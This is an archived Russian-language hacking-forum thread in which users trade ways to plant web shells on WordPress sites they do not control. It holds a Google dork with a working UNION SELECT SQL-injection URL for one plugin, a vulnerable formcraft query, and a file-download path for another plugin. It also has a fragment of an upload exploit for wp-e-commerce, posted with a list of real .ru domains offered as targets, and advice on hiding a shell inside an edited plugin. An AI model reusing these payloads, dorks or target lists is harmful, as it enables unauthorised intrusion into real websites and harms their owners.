ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.11.2013, 06:16
|
|
Новичок
Регистрация: 15.06.2010
Сообщений: 0
Провел на форуме:
16546
Репутация:
0
|
|
Извиняюсь если не туда пишу, можно ли залить шелл на вордпресс 3.7.1 если нет прав на запись файлов?
|
|
|
10.11.2013, 21:06
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от psihoz26
Google dork:
Код:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
Vulnerable script:
Код:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
это до какой версии работало?
|
|
|
|
11.12.2013, 19:24
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
Провел на форуме:
44130
Репутация:
26
|
|
formcraft Plugin Sql Injection
файл /wp-content/plugins/formcraft/form.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]get_results[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM[/COLOR][COLOR="#0000BB"]$table_builder[/COLOR][COLOR="#DD0000"]WHERE id=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"ARRAY_A"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$con[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'con'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$con[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]json_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$con[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
inurl:"plugins/formcraft/" |
|
|
|
20.12.2013, 14:11
|
|
Познающий
Регистрация: 11.12.2013
Сообщений: 62
Провел на форуме:
21252
Репутация:
15
|
|
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
|
|
|
|
22.12.2013, 21:56
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от hpol
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
Сейчас как раз дописываю одну вещь по аплоаду в WP.
Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.
|
|
|
|
27.01.2014, 16:56
|
|
Новичок
Регистрация: 25.01.2014
Сообщений: 1
Провел на форуме:
322
Репутация:
0
|
|
Custom Content Type Manager
Код:
url : http://yoursite.com/wp-content/plugins/custom-content-type-manager/ajax-controllers/download_def.php
скачать .json
вид Admin Email |
|
|
|
30.01.2014, 13:06
|
|
Познающий
Регистрация: 16.03.2007
Сообщений: 48
Провел на форуме:
293334
Репутация:
39
|
|
Сообщение от hpol
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
Когда просит пасс итд все равно все залилось Пробуй
|
|
|
|
01.02.2014, 18:17
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
Провел на форуме:
706093
Репутация:
97
|
|
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]"@[/COLOR][COLOR="#0000BB"]$uploadfile[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$postResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$postResult[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
©Взято от Сюда
Вот только не заливается шелл немогу понять в чём причина, кто разберется будьте добры помочь, вот Вам домены для теста:
Код:
http://1CCLUB.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://40MOBILE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://4WR.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://9899669.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AFSERVICE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AISBERG24.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALL-HTC.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALTERKRESLA.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AMARTCOM.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://angel23.ru/wp-content/plugins/wp-e-commerce/readme.txt
http://ANTIKFOREVERY1.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APIKLIN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APK-NN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARCHIMEDNOV.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARENDAMD.RU/wp-content/plugins/wp-e-commerce/readme.txt
Домены именно той версии которую требует уязвимость.
|
|
|
|
15.02.2014, 02:19
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1
Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает
Способ с 2 админами тоже не катит
|
|
|
|
15.02.2014, 13:31
|
|
Участник форума
Регистрация: 07.09.2013
Сообщений: 173
Провел на форуме:
62329
Репутация:
19
|
|
Сообщение от grimnir
Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1
Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает
Способ с 2 админами тоже не катит
Редактировать а не устанавливать плагины. Может быть проверка контрольной суммы, так что выбирать плагин с кол-вом строк >=, чем в шеле.
P.s. Ну и сам шелл возьми из паблика, с минимальным кол-вом строк, потом свой перезальешь.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
